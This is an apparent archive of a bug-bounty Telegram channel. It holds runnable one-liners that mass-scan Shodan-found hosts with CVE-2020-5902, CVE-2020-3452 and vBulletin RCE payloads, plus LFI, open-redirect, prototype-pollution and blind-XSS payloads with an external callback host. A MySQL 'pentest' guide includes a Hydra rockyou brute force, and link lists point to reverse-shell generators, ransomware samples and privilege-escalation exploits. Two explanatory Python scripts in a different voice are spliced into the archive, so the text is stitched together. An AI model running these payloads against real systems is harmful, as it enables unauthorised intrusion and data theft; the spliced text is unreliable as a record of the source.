Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5,849 subscribers

Posts archive
You can now passively enumerate all endpoints of a website with katana (no need for waybackurls). Example:

```bash
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
```

You can then check the status of these endpoints, or filter them, in order to find new vulnerabilities. Example:

```bash
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
```
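A practitioner's post-processing step for the list katana produces, added here as an example (it is not part of the tip above and not katana's own code). Two things the `grep -E '\.(js|php)$'` in the tip misses: it tests the whole URL, so `/login.php?id=1` is dropped even though the path ends in `.php`; and passive sources return the same endpoint with hundreds of different parameter values, so a filtered list is mostly duplicates. The script below filters on the path extension and keeps one representative per (host, path, parameter-name set), replacing values with a `FUZZ` placeholder the way qsreplace does. The sample URLs are constructed for the example.

```python
"""Deduplicate and filter a passive endpoint list (e.g. `katana -f qurl` output)."""
import posixpath
import sys
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Constructed sample input; stands in for real `katana -passive` output.
SAMPLE_URLS = [
    "https://www.example.gov/app/login.php?user=a&redirect=/home",
    "https://www.example.gov/app/login.php?redirect=/x&user=b",
    "https://WWW.example.gov/app/login.php?user=c&redirect=/y#top",
    "https://www.example.gov/static/app.min.js?v=123",
    "https://www.example.gov/static/app.min.js?v=456",
    "https://www.example.gov/static/app.min.js",
    "https://www.example.gov/images/logo.png",
    "https://www.example.gov/api/users?id=7",
]


def path_extension(url):
    """Extension of the URL *path* only; query string and fragment are ignored."""
    path = urlsplit(url).path
    return posixpath.splitext(path)[1].lstrip(".").lower()


def canonical(url, placeholder="FUZZ"):
    """Return (dedupe key, canonical URL).

    Key: lower-cased host, path, sorted parameter names.  Scheme and fragment
    are left out of the key; parameter values are replaced by `placeholder`
    so the result can be fed straight to a fuzzer.
    """
    parts = urlsplit(url)
    names = sorted(parse_qs(parts.query, keep_blank_values=True))
    host = parts.netloc.lower()
    query = urlencode([(name, placeholder) for name in names])
    key = (host, parts.path, tuple(names))
    return key, urlunsplit((parts.scheme.lower(), host, parts.path, query, ""))


def dedupe_endpoints(urls, extensions=None):
    """Keep the first URL seen per endpoint key, optionally limited to
    paths whose extension is in `extensions` (e.g. {"js", "php"})."""
    seen = set()
    out = []
    for url in urls:
        if extensions is not None and path_extension(url) not in extensions:
            continue
        key, canon = canonical(url)
        if key in seen:
            continue
        seen.add(key)
        out.append(canon)
    return out


if __name__ == "__main__":
    # Usage: python dedupe.py endpoints   (or no argument to run on the sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            urls = [line.strip() for line in fh if line.strip()]
    else:
        urls = SAMPLE_URLS
    for endpoint in dedupe_endpoints(urls, extensions={"js", "php"}):
        print(endpoint)
```

Run it on the `endpoints` file from the tip instead of the `grep`; three of the eight sample URLs survive, and `/api/users?id=7` is dropped only because the filter asks for `js`/`php` (call `dedupe_endpoints(urls)` without `extensions` to keep extensionless API paths).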

Awesome One-liner Bug Bounty

> A collection of awesome one-liner scripts especially for bug bounty. This repository stores and houses various one-liners for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.

## Definitions

This section defines specific terms or placeholders that are used throughout the one-line commands/scripts.

- 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.
- 1.2. "HOSTS.txt" contains more than one entry meeting criterion 1.1, one per line.
- 2.1. "URL" defines a full URL, e.g. replaced by http://domain.tld/path/page.html or anything starting with the HTTP/HTTPS scheme.
- 2.2. "URLS.txt" contains more than one entry meeting criterion 2.1, one per line.
- 3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script according to its context and needs.
- 4.1. "OUT.txt" or "OUT{N}.txt" means the file in which the executed command stores its results.

---

### Local File Inclusion

> @dwisiswant0

```bash
# Replace query values with /etc/passwd and flag responses containing the passwd header
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
```

### Open-redirect

> @dwisiswant0

```bash
# LHOST is exported so the sh -c children can see it; HOST is the target (was "$1" in the original)
export LHOST="URL"; gau HOST | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
```

> @N3T_hunt3r

```bash
# Collect redirect candidates and replay them through a local proxy (e.g. Burp on 8080)
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
```

### XSS

> @cihanmehmet

```bash
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
```

> @fanimalikhack

```bash
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
```

> @oliverrickfors

```bash
# Find scripts that register a postMessage handler (DOM XSS candidates)
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
```

### Prototype Pollution

> @R0X4R

```bash
subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
```

### CVE-2020-5902

> @Madrobot_

```bash
# Loop syntax fixed ("while read host do ;do" -> "while read host; do"); colour reset added
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && printf "$host \033[0;31mVulnerable\033[0m\n" || printf "$host \033[0;32mNot Vulnerable\033[0m\n"; done
```

### CVE-2020-3452

> @vict0ni

```bash
# GREEN/RED/NC were used but never defined in the original one-liner
GREEN='\033[0;32m'; RED='\033[0;31m'; NC='\033[0m'; while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
```

### CVE-2022-0378

> @7h3h4ckv157

```bash
# Loop syntax fixed ("while read h do; do" -> "while read h; do")
cat URLS.txt | while read h; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x" | grep -qs "onmouse" && echo "$h: VULNERABLE"; done
```

### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution

> @Madrobot_

```bash
# Loop syntax fixed; colour reset added
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && printf "$host \033[0;31mVulnerable\033[0m\n" || printf "$host \033[0;32mNot Vulnerable\033[0m\n"; done
```

### Find JavaScript Files

> @D0cK3rG33k

Attachments: osint-chatgpt-prompts (1)-1.pdf (1.41 MB); 🚨Bounty Tips Collected From Twitter🚨.pdf (2.26 KB); 660704457-ChatGPT-Advantage-V2-3-1.pdf (1.59 MB)

Penetration Testing on MySQL Port 3306

MySQL is a popular open-source relational database management system (RDBMS) that is widely used in web applications. As a penetration tester, it's essential to identify vulnerabilities in MySQL to prevent unauthorized access to sensitive data. In this article, we'll explore how to conduct a penetration test on MySQL port 3306.

Initial Reconnaissance

Before we begin, let's perform some initial reconnaissance to gather information about the target system. We can use tools like Nmap to scan the target IP address and identify open ports.

```bash
nmap -sT 192.168.1.100
```

The output should reveal that port 3306 is open, indicating that MySQL is running on the target system.

MySQL Version Scanning

Next, we'll use Nmap to scan the MySQL version. We can use the -sV option to enable version detection.

```bash
nmap -sV 192.168.1.100 -p 3306
```

The output should display the MySQL version, which can help us identify potential vulnerabilities.

Authentication Bypass

Now, let's try to bypass authentication using the mysql command. We can use the -h option to specify the target IP address and the -u option to specify the username.

```bash
mysql -h 192.168.1.100 -u root
```

If the password is not set or is weak, we might be able to gain access to the MySQL database without authentication.

SQL Injection

SQL injection is a common vulnerability in web applications that use MySQL. We can use tools like SQLMap to identify SQL injection vulnerabilities.

```bash
sqlmap -u "http://192.168.1.100/vulnerable.php?id=1" --dbms=mysql
```

SQLMap will attempt to inject SQL code to extract sensitive data from the database.

Brute Force Attack

If we're unable to bypass authentication or find an SQL injection vulnerability, we can try a brute force attack using tools like Hydra.

```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.100 mysql
```

Hydra will attempt to guess the password using a dictionary attack.

Conclusion

I've demonstrated how to conduct a penetration test on MySQL port 3306. We've shown how to perform initial reconnaissance, scan the MySQL version, bypass authentication, identify SQL injection vulnerabilities, and launch a brute force attack. Remember to always conduct penetration tests with permission from the system owner and to follow applicable laws and regulations.
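What `nmap -sV` actually reads on 3306 is the server's first packet, the Handshake V10 greeting, which the server sends before any credentials are exchanged. The example below, added here and not taken from the article above, builds two such greetings plus the pre-authentication ERR packet a host-ACL-restricted server returns (error 1130, the usual reason the `mysql -h ... -u root` step fails before a password is even asked for), then decodes them. The byte layout follows the MySQL client/server protocol; the version strings, connection ids, salt and client IP are constructed for the example, not captured from a real host. The `assess` function turns the greeting into the report points the version-scanning step is really after: is TLS offered at all, and which authentication plugin is the default.

```python
"""Decode the MySQL Handshake V10 greeting that a version scan sees on port 3306."""
import struct

# Capability flag bits from the MySQL client/server protocol.
CLIENT_SSL = 0x00000800
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
ER_HOST_NOT_PRIVILEGED = 1130  # "Host 'x' is not allowed to connect to this MySQL server"


def build_handshake(version, conn_id, caps, plugin, salt=bytes(range(1, 21))):
    """Assemble a Handshake V10 packet as a server would (used to construct
    sample input for this example; real servers send 20 salt bytes)."""
    p = bytearray([10])                              # protocol version
    p += version.encode() + b"\x00"                  # server version, NUL-terminated
    p += struct.pack("<I", conn_id)                  # connection id
    p += salt[:8] + b"\x00"                          # auth-plugin-data part 1 + filler
    p += struct.pack("<H", caps & 0xFFFF)            # capability flags, lower 16 bits
    p += b"\xff"                                     # default character set
    p += struct.pack("<H", 0x0002)                   # status flags (SERVER_STATUS_AUTOCOMMIT)
    p += struct.pack("<H", caps >> 16)               # capability flags, upper 16 bits
    p += bytes([len(salt) + 1 if caps & CLIENT_PLUGIN_AUTH else 0])
    p += bytes(10)                                   # reserved
    p += salt[8:] + b"\x00"                          # auth-plugin-data part 2 (13 bytes)
    if caps & CLIENT_PLUGIN_AUTH:
        p += plugin.encode() + b"\x00"               # default auth plugin name
    return struct.pack("<I", len(p))[:3] + b"\x00" + bytes(p)


def build_error(code, message):
    """Pre-auth ERR packet (no SQL-state marker at this stage of the protocol)."""
    p = b"\xff" + struct.pack("<H", code) + message.encode()
    return struct.pack("<I", len(p))[:3] + b"\x00" + p


def parse_handshake(packet):
    """Return a dict describing the greeting, or the error the server sent instead."""
    length = int.from_bytes(packet[:3], "little")
    p = packet[4:4 + length]
    if len(p) != length:
        raise ValueError("truncated packet")
    if p[0] == 0xFF:                                 # ERR packet instead of a greeting
        code = struct.unpack_from("<H", p, 1)[0]
        return {"error_code": code, "error": p[3:].decode(errors="replace")}
    if p[0] != 10:
        raise ValueError("unsupported handshake protocol %d" % p[0])
    end = p.index(b"\x00", 1)
    version = p[1:end].decode()
    pos = end + 1
    conn_id = struct.unpack_from("<I", p, pos)[0]
    salt = p[pos + 4:pos + 12]
    pos += 13                                        # 4 conn id + 8 salt + 1 filler
    caps_lo, charset, status, caps_hi, auth_len = struct.unpack_from("<HBHHB", p, pos)
    pos += 8 + 10                                    # the fields above + 10 reserved bytes
    caps = caps_lo | (caps_hi << 16)
    plugin = None
    if caps & CLIENT_SECURE_CONNECTION:
        part2 = max(13, auth_len - 8)
        salt += p[pos:pos + part2].rstrip(b"\x00")
        pos += part2
    if caps & CLIENT_PLUGIN_AUTH:
        plugin = p[pos:p.index(b"\x00", pos)].decode()
    return {"version": version, "connection_id": conn_id, "capabilities": caps,
            "ssl": bool(caps & CLIENT_SSL), "auth_plugin": plugin,
            "salt_len": len(salt), "charset": charset, "status": status}


def assess(info):
    """Report points derived from the greeting alone, before any login attempt."""
    notes = []
    if "error_code" in info:
        if info["error_code"] == ER_HOST_NOT_PRIVILEGED:
            notes.append("host ACL rejects this source IP; password guessing from here is pointless")
        else:
            notes.append("server refused the connection: error %d" % info["error_code"])
        return notes
    if not info["ssl"]:
        notes.append("CLIENT_SSL not advertised: queries and results travel in cleartext")
    if info["auth_plugin"] in (None, "mysql_native_password"):
        notes.append("SHA-1 based mysql_native_password (or pre-plugin auth) is the default")
    return notes


# Constructed sample packets (not captured traffic).
MODERN_PKT = build_handshake("8.0.33", 42, CLIENT_SSL | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH,
                             "caching_sha2_password")
LEGACY_PKT = build_handshake("5.5.62-0+deb8u1", 7, CLIENT_SECURE_CONNECTION, "mysql_native_password")
ERR_PKT = build_error(ER_HOST_NOT_PRIVILEGED, "Host '10.0.0.5' is not allowed to connect to this MySQL server")

if __name__ == "__main__":
    for pkt in (MODERN_PKT, LEGACY_PKT, ERR_PKT):
        info = parse_handshake(pkt)
        print(info)
        for note in assess(info):
            print("  -", note)
```

To use it against a live host, replace the constructed packets with the first bytes read from a TCP socket to port 3306; the server speaks first, so no request needs to be sent. Note that the version string is leaked to anyone who can complete the TCP handshake, which is why the article's version-scanning step works without credentials.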

Hackerone got hacked! How can I steal your POC? 🥷🏻 • Weakness - Sensitive Information Disclosure • Bounty - $15,000 • CC - Hasyim. Critical bugs directly upstream, in the bug bounty platform itself (HackerOne): https://kresec.medium.com/hackerone-got-hacked-how-can-i-steal-your-poc-01a9132c5aeb

The new Burp Suite feature, Bambdas, is so cool. If you know the best way to use it, it will give you all the OWASP Top 10 vulnerability parameter patterns, just like gf patterns but in a beautiful coloured GUI. Must try this..
https://github.com/PortSwigger/bambdas/blob/main/Filter/Proxy/HTTP/FilterHighlightAnnotateOWASP.bambda
https://github.com/BugBountyzip/Bambdas/tree/main
https://marketplace.bugbounty.zip/BurpBambdas/#

#Threat_Research
1. Novel Pipeline Vulnerability; Rust Found Vulnerable
   https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-discovered-in-rust
2. MSI - Masquerading as a Software Installer
   https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

#Malware_analysis
1. DuckLogs Malware
   https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild
2. A PoC ransomware sample to test out your ransomware response strategy
   https://github.com/hazcod/ransomwhere

#Threat_Research #Blue_Team_Techniques
1. Threatest - CLI and Go framework for end-to-end testing of threat detection rules
   https://github.com/DataDog/threatest
2. DeTT&CT - Detect Tactics, Techniques & Combat Threats
   https://github.com/rabobank-cdc/DeTTECT

#tools #Offensive_security
1. PrintNotifyPotato - privilege escalation via the PrintNotify COM service (Windows 10, 11, Server 2012 - 2022)
   https://github.com/BeichenDream/PrintNotifyPotato
2. Script for generating reverse shells
   https://github.com/4ndr34z/shells
3. PoC implementation of a TRUE call stack spoofer
   https://github.com/klezVirus/SilentMoonwalk

#Threat_Research
Pre-Auth RCE with CodeQL in Under 20 Minutes
https://frycos.github.io/vulns4free/2022/12/02/rce-in-20-minutes.html

#exploit
1. CVE-2022-2650: Brute Force on wger workout application v2.0
   https://github.com/HackinKraken/CVE-2022-2650
2. CVE-2022-44721: CrowdStrike Falcon Uninstaller
   https://github.com/purplededa/CVE-2022-44721-CsFalconUninstaller

#Malware_analysis
1. Buyer Beware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware
   https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware
2. Blowing Cobalt Strike Out of the Water With Memory Analysis
   https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis

#tools #Offensive_security
1. HTB: CarpeDiem
   https://0xdf.gitlab.io/2022/12/03/htb-carpediem.html
2. SysmonEoP - PoC for arbitrary file delete/write in Sysmon (CVE-2022-41120/CVE-2022-XXXXX)
   https://github.com/Wh04m1001/SysmonEoP
3. Nim DLL sideloading/proxying
   https://github.com/byt3bl33d3r/NimDllSideload

#reversing
1. GL.iNET GL-MT300N-V2 Router Vulnerabilities and Hardware Teardown
   https://boschko.ca/glinet-router
2. Hacking the router firmware used by the (Telia) TG799vac Xtream v17.2-MINT, delivered by Technicolor
   https://github.com/wuseman/TG799VAC-XTREME-17.2-MINT

#Threat_Research
1. HTTP Desync Attack (Request Smuggling) - Mass Account Takeover at a Cryptocurrency-based asset and 121 other websites
   https://github.com/AnkitCuriosity/Write-Ups/blob/main/HTTP%20Desync%20Attack%20(Request%20Smuggling).md
2. Visual Studio Code: RCE
   https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m